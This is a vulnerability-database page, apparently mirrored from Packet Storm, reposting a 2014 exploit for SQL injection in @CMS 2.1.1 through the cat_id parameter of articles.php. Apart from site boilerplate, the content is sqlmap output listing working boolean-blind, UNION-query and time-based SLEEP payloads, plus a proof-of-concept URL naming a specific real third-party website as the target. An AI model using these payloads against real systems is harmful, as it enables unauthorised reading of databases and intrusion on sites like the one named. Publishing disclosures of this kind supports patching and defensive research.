Lucene search
K

@CMS 2.1.1 SQL Injection

🗓️ 24 Aug 2014 00:00:00Reported by RenziType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

SQL Injection risk on @CMS 2.1.1 Stable, vendor www.atcode.net, tested on Linux Mint, vulnerable file articles.php, exploits using boolean-based blind, UNION query, and time-based blind techniques

Code
`# SQL Injection on @CMS 2.1.1 Stable  
  
# Risk: High  
  
# CWE number: CWE-89  
  
# Date: 22/08/2014  
  
# Vendor: www.atcode.net  
  
# Author: Felipe " Renzi " Gabriel  
  
# Contact: [email protected]  
  
# Tested on: Linux Mint  
  
# Vulnerable File: articles.php  
  
# Exploit: http://host/articles.php?cat_id=[SQLI]  
  
# PoC: http://carla-columna.de/articles.php?cat_id=[SQLI]  
  
  
--- "SQLi using sqlmap."---  
  
Place: GET  
Parameter: cat_id  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 10 columns  
Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind  
Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs  
---  
  
# Thank's  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation